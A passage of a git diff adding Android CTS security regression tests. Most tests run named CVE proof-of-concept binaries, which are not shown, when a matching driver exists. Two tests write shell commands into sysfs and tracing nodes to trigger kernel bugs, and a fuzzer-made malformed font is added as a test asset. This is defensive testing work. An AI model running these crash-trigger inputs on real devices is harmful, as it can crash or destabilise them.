+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..a6160d5
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,258 @@
+/**
+0;256;0c * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31606947
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8424() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31797770
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32700935
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8435() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31568617
+ */
+ @SecurityTest
+ public void testPocCVE_2016_9120() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+ }
+ }
+
+ //Highs
+ /**
+ * b/31225246
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8412() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+ AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31243641
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8444() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+ AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31791148
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8448() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31798848
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8449() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+ AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32402548
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0403() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+ }
+
+ /**
+ * b/32510733
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0404() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/asound/version")) {
+ AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32178033
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8451() throws Exception {
+ enableAdbRoot(getDevice());
+ String command =
+ "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+
+ /**
+ * b/32659848
+ */
+ @SecurityTest
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..f8ed22a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,44 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_01 extends SecurityTestCase {
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32636619
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+ }
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b6599c1..5c84850 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -64,6 +64,17 @@
}
/**
+ * Check if a driver is present on a machine
+ */
+ public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+ String result = mDevice.executeShellCommand("ls -Zl " + driver);
+ if(result.contains("No such file or directory")) {
+ return false;
+ }
+ return true;
+ }
+
+ /**
* Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
* (due to rounding) of the previous boottime to check if The phone has crashed.
*/
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
index 8bfc762..98982fc 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
@@ -123,6 +123,10 @@
* is launched to side from docked stack.
*/
public void testConfigurationUpdatesWhenRotatingToSideFromDocked() throws Exception {
+ if (!supportsScreenRotation()) {
+ CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no rotation support");
+ return;
+ }
if (!supportsSplitScreenMultiWindow()) {
CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no multi-window support");
return;
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
index 86e7b6c..773584e 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
@@ -83,8 +83,7 @@
launchActivityInDockStack(LAUNCHING_ACTIVITY);
mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY});
launchActivityToSide();
- mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY, TEST_ACTIVITY_NAME});
-
+ mAmWmState.computeState(mDevice, new String[] {TEST_ACTIVITY_NAME});
mAmWmState.assertContainsStack(
"Must contain fullscreen stack.", FULLSCREEN_WORKSPACE_STACK_ID);
mAmWmState.assertContainsStack("Must contain docked stack.", DOCKED_STACK_ID);
@@ -138,7 +137,6 @@
launchActivityInDockStack(LAUNCHING_ACTIVITY);
mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY});
-
final String[] waitForActivitiesVisible =
new String[] {TEST_ACTIVITY_NAME, LAUNCHING_ACTIVITY};
@@ -377,7 +375,6 @@
CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no multi-window support");
return;
}
-
final String[] waitTestActivityName = new String[] {TEST_ACTIVITY_NAME};
executeShellCommand(getAmStartCmd(TEST_ACTIVITY_NAME));
mAmWmState.computeState(mDevice, waitTestActivityName);
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index 354b43c..77119c0 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -19,10 +19,12 @@
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.testtype.DeviceTestCase;
import java.util.HashMap;
import java.util.Map;
+import java.util.regex.Pattern;
public class CrossAppDragAndDropTests extends DeviceTestCase {
// Constants copied from ActivityManager.StackId. If they are changed there, these must be
@@ -47,13 +49,17 @@
private static final String INPUT_MOUSE_SWIPE = "input mouse swipe ";
private static final String TASK_ID_PREFIX = "taskId";
+ // Regex pattern to match adb shell am stack list output of the form:
+ // taskId=<TASK_ID>: <componentName> bounds=[LEFT,TOP][RIGHT,BOTTOM]
+ private static final String TASK_REGEX_PATTERN_STRING =
+ "taskId=[0-9]+: %s bounds=\\[[0-9]+,[0-9]+\\]\\[[0-9]+,[0-9]+\\]";
+
private static final int SWIPE_DURATION_MS = 500;
private static final String SOURCE_PACKAGE_NAME = "android.wm.cts.dndsourceapp";
private static final String TARGET_PACKAGE_NAME = "android.wm.cts.dndtargetapp";
private static final String TARGET_23_PACKAGE_NAME = "android.wm.cts.dndtargetappsdk23";
-
private static final String SOURCE_ACTIVITY_NAME = "DragSource";
private static final String TARGET_ACTIVITY_NAME = "DropTarget";
@@ -94,6 +100,7 @@
super.setUp();
mDevice = getDevice();
+
if (!supportsDragAndDrop()) {
return;
}
@@ -217,8 +224,15 @@
CollectingOutputReceiver outputReceiver = new CollectingOutputReceiver();
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
+ final StringBuilder builder = new StringBuilder();
+ builder.append("Finding task info for task: ");
+ builder.append(name);
+ builder.append("\nParsing adb shell am output: " );
+ builder.append(output);
+ CLog.i(builder.toString());
+ final Pattern pattern = Pattern.compile(String.format(TASK_REGEX_PATTERN_STRING, name));
for (String line : output.split("\\n")) {
- if (line.contains(name)) {
+ if (pattern.matcher(line).find()) {
return line;
}
}
@@ -331,8 +345,15 @@
}
private boolean supportsDragAndDrop() throws Exception {
- // Do not run this test on watches.
- return !mDevice.hasFeature("feature:android.hardware.type.watch");
+ String supportsMultiwindow = mDevice.executeShellCommand("am supports-multiwindow").trim();
+ if ("true".equals(supportsMultiwindow)) {
+ return true;
+ } else if ("false".equals(supportsMultiwindow)) {
+ return false;
+ } else {
+ throw new Exception(
+ "device does not support \"am supports-multiwindow\" shell command.");
+ }
}
public void testCancelSoon() throws Exception {
diff --git a/tests/app/src/android/app/cts/SearchManagerTest.java b/tests/app/src/android/app/cts/SearchManagerTest.java
index 3a20225..bf7e2f9 100644
--- a/tests/app/src/android/app/cts/SearchManagerTest.java
+++ b/tests/app/src/android/app/cts/SearchManagerTest.java
@@ -16,11 +16,13 @@
package android.app.cts;
+import android.app.SearchManager;
+import android.app.UiModeManager;
import android.app.stubs.CTSActivityTestCaseBase;
import android.app.stubs.SearchManagerStubActivity;
import android.content.Context;
import android.content.Intent;
-import android.content.pm.PackageManager;
+import android.content.res.Configuration;
public class SearchManagerTest extends CTSActivityTestCaseBase {
@@ -33,7 +35,7 @@
}
public void testStopSearch() throws InterruptedException {
- if (isTelevision() || isWatch()) {
+ if (!hasGlobalSearchActivity()) {
return;
}
SearchManagerStubActivity.setCTSResult(this);
@@ -42,7 +44,7 @@
}
public void testSetOnDismissListener() throws InterruptedException {
- if (isTelevision() || isWatch()) {
+ if (!hasGlobalSearchActivity()) {
return;
}
SearchManagerStubActivity.setCTSResult(this);
@@ -51,7 +53,7 @@
}
public void testSetOnCancelListener() throws InterruptedException {
- if (isTelevision() || isWatch()) {
+ if (!hasGlobalSearchActivity()) {
return;
}
SearchManagerStubActivity.setCTSResult(this);
@@ -59,16 +61,22 @@
waitForResult();
}
- private boolean isTelevision() {
+ private boolean hasGlobalSearchActivity() {
Context context = getInstrumentation().getTargetContext();
- PackageManager pm = context.getPackageManager();
- return pm.hasSystemFeature(PackageManager.FEATURE_TELEVISION)
- || pm.hasSystemFeature(PackageManager.FEATURE_LEANBACK);
- }
-
- private boolean isWatch() {
- Context context = getInstrumentation().getTargetContext();
- PackageManager pm = context.getPackageManager();
- return pm.hasSystemFeature(PackageManager.FEATURE_WATCH);
+ UiModeManager uiModeManager = context.getSystemService(UiModeManager.class);
+ if (uiModeManager.getCurrentModeType() == Configuration.UI_MODE_TYPE_TELEVISION) {
+ return false;
+ }
+ SearchManager searchManager =
+ (SearchManager) context.getSystemService(Context.SEARCH_SERVICE);
+ if (searchManager == null) {
+ return false;
+ }
+ try {
+ return searchManager.getGlobalSearchActivity() != null;
+ } catch (NullPointerException e) {
+ // Means there is no internal search service.
+ return false;
+ }
}
}
diff --git a/tests/tests/content/Android.mk b/tests/tests/content/Android.mk
index 699d839..1c5f6ae 100644
--- a/tests/tests/content/Android.mk
+++ b/tests/tests/content/Android.mk
@@ -23,13 +23,15 @@
LOCAL_JAVA_LIBRARIES := android.test.runner
-LOCAL_STATIC_JAVA_LIBRARIES := android-support-v4 \
- android-support-multidex \
- ctsdeviceutil \
- ctstestrunner \
- services.core \
- junit \
- legacy-android-test
+LOCAL_STATIC_JAVA_LIBRARIES := \
+ android-support-v4 \
+ android-support-multidex \
+ ctsdeviceutil \
+ ctstestrunner \
+ services.core \
+ junit \
+ legacy-android-test \
+
# Use multi-dex as the compatibility-common-util-devicesidelib dependency
# on ctsdeviceutil pushes us beyond 64k methods.
diff --git a/tests/tests/graphics/assets/ft45987.ttf b/tests/tests/graphics/assets/ft45987.ttf
new file mode 100644
index 0000000..369022f
--- /dev/null
+++ b/tests/tests/graphics/assets/ft45987.ttf
Binary files differ
diff --git a/tests/tests/graphics/assets/ft45987.ttf.README.txt b/tests/tests/graphics/assets/ft45987.ttf.README.txt
new file mode 100644
index 0000000..7586955
--- /dev/null
+++ b/tests/tests/graphics/assets/ft45987.ttf.README.txt
@@ -0,0 +1,4 @@
+ft45987.ttf was automatically generated by LibFuzzer
+(http://llvm.org/docs/LibFuzzer.html). Its base64 encoded version was taken
+from http://savannah.nongnu.org/bugs/?func=detailitem&item_id=45987 and
+decoded back.
diff --git a/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java b/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java
index e5a610c..7ac679a 100644
--- a/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java
+++ b/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java
@@ -221,4 +221,9 @@
typeface3, typeface4);
}
+ @SmallTest
+ public void testBadFont() {
+ Typeface typeface = Typeface.createFromAsset(getContext().getAssets(), "ft45987.ttf");
+ assertNotNull(typeface);
+ }
}
diff --git a/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java b/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java
index 6deaed4..4a4ea98 100644
--- a/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java
+++ b/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java
@@ -271,12 +271,12 @@
continue;
}
}
- if ((i > 0) && ((i % 8 ) == 0)) {
+ if ((i >= 64) && ((i % 8 ) == 0)) {
keyGenerator.init(spec, rng);
SecretKey key = keyGenerator.generateKey();
assertEquals(i, TestUtils.getKeyInfo(key).getKeySize());
assertEquals((i + 7) / 8, rng.getOutputSizeBytes());
- } else {
+ } else if (i >= 64) {
try {
keyGenerator.init(spec, rng);
fail();
diff --git a/tests/tests/location/src/android/location/cts/LocationManagerTest.java b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
index 7fcc2aa..3af213e 100644
--- a/tests/tests/location/src/android/location/cts/LocationManagerTest.java
+++ b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
@@ -993,6 +993,27 @@
}
}
+ /**
+ * Test case for bug 33091107, where a malicious app used to be able to fool a real provider
+ * into providing a mock location that isn't marked as being mock.
+ */
+ public void testLocationShouldStillBeMarkedMockWhenProvidersDoNotMatch()
+ throws InterruptedException {
+ double latitude = 20;
+ double longitude = 40;
+
+ List<String> providers = mManager.getAllProviders();
+ if (providers.isEmpty()) {
+ // Device doesn't have any providers. Can't perform this test, and no need to do so:
+ // no providers that malicious app could fool
+ return;
+ }
+ String realProviderToFool = providers.get(0);
+
+ // Register for location updates, then set a mock location and ensure it is marked "mock"
+ updateLocationAndWait(TEST_MOCK_PROVIDER_NAME, realProviderToFool, latitude, longitude);
+ }
+
@UiThreadTest
public void testGpsStatusListener() {
MockGpsStatusListener listener = new MockGpsStatusListener();
@@ -1152,22 +1173,38 @@
private void updateLocationAndWait(String providerName, double latitude, double longitude)
throws InterruptedException {
+ updateLocationAndWait(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocationAndWait(String, double, double)}, but allows inconsistent providers
+ * to be used in the calls to {@link Location#Location(String)} and {@link
+ * LocationManager#setTestProviderLocation(String, Location)}
+ *
+ * @param testProviderName used in {@link LocationManager#setTestProviderLocation(String,
+ * Location)}
+ * @param locationProviderName used in {@link Location#Location(String)}
+ */
+ private void updateLocationAndWait(String testProviderName, String locationProviderName,
+ double latitude, double longitude) throws InterruptedException {
+
// Register a listener for the location we are about to set.
MockLocationListener listener = new MockLocationListener();
HandlerThread handlerThread = new HandlerThread("updateLocationAndWait");
handlerThread.start();
- mManager.requestLocationUpdates(providerName, 0, 0, listener, handlerThread.getLooper());
+ mManager.requestLocationUpdates(locationProviderName, 0, 0, listener,
+ handlerThread.getLooper());
// Set the location.
- updateLocation(providerName, latitude, longitude);
+ updateLocation(testProviderName, locationProviderName, latitude, longitude);
// Make sure we received the location, and it is the right one.
- assertTrue(listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
+ assertTrue("Listener not called", listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
Location location = listener.getLocation();
- assertEquals(providerName, location.getProvider());
- assertEquals(latitude, location.getLatitude());
- assertEquals(longitude, location.getLongitude());
- assertEquals(true, location.isFromMockProvider());
+ assertEquals("Bad provider name", locationProviderName, location.getProvider());
+ assertEquals("Bad latitude", latitude, location.getLatitude());
+ assertEquals("Bad longitude", longitude, location.getLongitude());
+ assertTrue("Bad isMock", location.isFromMockProvider());
// Remove the listener.
mManager.removeUpdates(listener);
@@ -1220,13 +1257,23 @@
private void updateLocation(final String providerName, final double latitude,
final double longitude) {
- Location location = new Location(providerName);
+ updateLocation(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocation(String, double, double)}, but allows inconsistent providers to be
+ * used in the calls to {@link Location#Location(String)} and
+ * {@link LocationManager#setTestProviderLocation(String, Location)}.
+ */
+ private void updateLocation(String testProviderName, String locationProviderName,
+ double latitude, double longitude) {
+ Location location = new Location(locationProviderName);
location.setLatitude(latitude);
location.setLongitude(longitude);
location.setAccuracy(1.0f);
- location.setTime(java.lang.System.currentTimeMillis());
+ location.setTime(System.currentTimeMillis());
location.setElapsedRealtimeNanos(SystemClock.elapsedRealtimeNanos());
- mManager.setTestProviderLocation(providerName, location);
+ mManager.setTestProviderLocation(testProviderName, location);
}
private void updateLocation(final double latitude, final double longitude) {
diff --git a/tests/tests/media/Android.mk b/tests/tests/media/Android.mk
index 1986934..0d27544 100644
--- a/tests/tests/media/Android.mk
+++ b/tests/tests/media/Android.mk
@@ -54,7 +54,8 @@
junit \
legacy-android-test
-LOCAL_JNI_SHARED_LIBRARIES := libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++ libndkaudioLib
+LOCAL_JNI_SHARED_LIBRARIES := libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++
+LOCAL_JNI_SHARED_LIBRARIES += libndkaudioLib libctsmediadrm_jni
# do not compress VP9 video files
LOCAL_AAPT_FLAGS := -0 .vp9
diff --git a/tests/tests/media/libmediandkjni/AMediaObjects.h b/tests/tests/media/libmediandkjni/AMediaObjects.h
new file mode 100644
index 0000000..c4d5397
--- /dev/null
+++ b/tests/tests/media/libmediandkjni/AMediaObjects.h
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef AMEDIAOBJECTS_H_
+#define AMEDIAOBJECTS_H_
+
+#include <utils/Log.h>
+
+#include "media/NdkMediaCrypto.h"
+#include "media/NdkMediaDrm.h"
+#include "media/NdkMediaExtractor.h"
+
+namespace {
+
+// Simple class to manage deletion of AMedia objects
+class AMediaObjects {
+ public:
+ AMediaObjects();
+ virtual ~AMediaObjects();
+
+ void setCrypto(AMediaCrypto* const theCrypto) {
+ mCrypto = theCrypto;
+ }
+ void setDrm(AMediaDrm* const theDrm) {
+ mDrm = theDrm;
+ }
+ void setVideoExtractor(AMediaExtractor* const theExtractor) {
+ mVideoExtractor = theExtractor;
+ }
+ void setAudioExtractor(AMediaExtractor* const theExtractor) {
+ mAudioExtractor = theExtractor;
+ }
+
+ AMediaCrypto* getCrypto() const { return mCrypto; }
+ AMediaDrm* getDrm() const { return mDrm; }
+ AMediaExtractor* getAudioExtractor() const { return mAudioExtractor; }
+ AMediaExtractor* getVideoExtractor() const { return mVideoExtractor; }
+
+ private:
+ AMediaCrypto *mCrypto;
+ AMediaDrm* mDrm;
+ AMediaExtractor* mAudioExtractor;
+ AMediaExtractor* mVideoExtractor;
+
+ // Disallow copy and assignment
+ AMediaObjects(const AMediaObjects&);
+ void operator=(const AMediaObjects&);
+};
+
+AMediaObjects::AMediaObjects(void) : mCrypto(NULL), mDrm(NULL),
+ mAudioExtractor(NULL), mVideoExtractor(NULL) {
+}
+
+AMediaObjects::~AMediaObjects() {
+ if (mCrypto) {
+ AMediaCrypto_delete(mCrypto);
+ }
+ if (mAudioExtractor) {
+ AMediaExtractor_delete(mAudioExtractor);
+ }
+ if (mVideoExtractor) {
+ AMediaExtractor_delete(mVideoExtractor);
+ }
+ if (mDrm) {
+ AMediaDrm_release(mDrm);
+ }
+}
+
+} // anonymous namespace
+#endif // AMEDIAOBJECTS_H_
+
diff --git a/tests/tests/media/libmediandkjni/Android.mk b/tests/tests/media/libmediandkjni/Android.mk
index 259c95e..1ccdede 100644
--- a/tests/tests/media/libmediandkjni/Android.mk
+++ b/tests/tests/media/libmediandkjni/Android.mk
@@ -14,6 +14,9 @@
#
LOCAL_PATH := $(call my-dir)
+#------------------------------------------------------------------------------
+# Builds libctsmediacodec_jni.so
+#
include $(CLEAR_VARS)
LOCAL_MODULE := libctsmediacodec_jni
@@ -21,20 +24,57 @@
LOCAL_MODULE_TAGS := optional
LOCAL_SRC_FILES := \
- native-media-jni.cpp \
- codec-utils-jni.cpp \
- md5_utils.cpp
+ native-media-jni.cpp \
+ codec-utils-jni.cpp \
+ md5_utils.cpp
LOCAL_C_INCLUDES := \
- $(JNI_H_INCLUDE) \
- system/core/include
+ $(JNI_H_INCLUDE) \
+ system/core/include
LOCAL_C_INCLUDES += $(call include-path-for, mediandk)
-LOCAL_SHARED_LIBRARIES := libandroid libnativehelper_compat_libc++ liblog libmediandk
+LOCAL_SHARED_LIBRARIES := \
+ libandroid libnativehelper_compat_libc++ \
+ liblog libmediandk
LOCAL_SDK_VERSION := 23
LOCAL_CFLAGS := -Werror -Wall
include $(BUILD_SHARED_LIBRARY)
+
+#------------------------------------------------------------------------------
+# Builds libctsmediadrm_jni.so
+#
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libctsmediadrm_jni
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := \
+ CtsMediaDrmJniOnLoad.cpp \
+ codec-utils-jni.cpp \
+ md5_utils.cpp \
+ native-mediadrm-jni.cpp \
+
+LOCAL_C_INCLUDES := \
+ $(JNI_H_INCLUDE) \
+ system/core/include
+
+
+LOCAL_C_INCLUDES += $(call include-path-for, mediandk)
+
+LOCAL_SHARED_LIBRARIES := \
+ libandroid libnativehelper_compat_libc++ \
+ liblog libmediandk libdl
+
+LOCAL_SDK_VERSION := 23
+
+LOCAL_NDK_STL_VARIANT := c++_static
+
+LOCAL_CFLAGS := -Werror -Wall
+
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/media/libmediandkjni/CtsMediaDrmJniOnLoad.cpp b/tests/tests/media/libmediandkjni/CtsMediaDrmJniOnLoad.cpp
new file mode 100644
index 0000000..24714a3
--- /dev/null
+++ b/tests/tests/media/libmediandkjni/CtsMediaDrmJniOnLoad.cpp
@@ -0,0 +1,34 @@
+/*
